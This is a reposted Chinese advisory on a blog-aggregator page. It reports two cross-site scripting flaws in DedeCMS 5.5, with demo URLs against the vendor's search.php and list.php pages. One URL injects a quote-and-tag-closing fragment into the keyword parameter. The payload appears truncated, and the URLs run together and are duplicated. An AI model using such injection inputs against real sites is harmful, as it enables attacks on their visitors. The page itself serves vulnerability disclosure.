dedecms织梦 v5.5 两处跨站漏洞
程序员文章站
2024-01-11 08:21:34
影响版本: dedecms织梦5.5 漏洞描述: demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=... 11-03-11...
影响版本:
dedecms织梦5.5
漏洞描述:
demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&totalresult=&pageno=2demo2:http://www.dedecms.com/plus/list.php?tid=6&totalresult=&nativeplace=0&infotype=0&keyword=&orderby=hot&pageno=2
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&totalresult=&pageno=2demo2:http://www.dedecms.com/plus/list.php?tid=6&totalresult=&nativeplace=0&infotype=0&keyword=&orderby=hot&pageno=2
上一篇: 应对临时设计需求,用易图网3分钟搞定
下一篇: 安卓开发中四大组件的哪四个?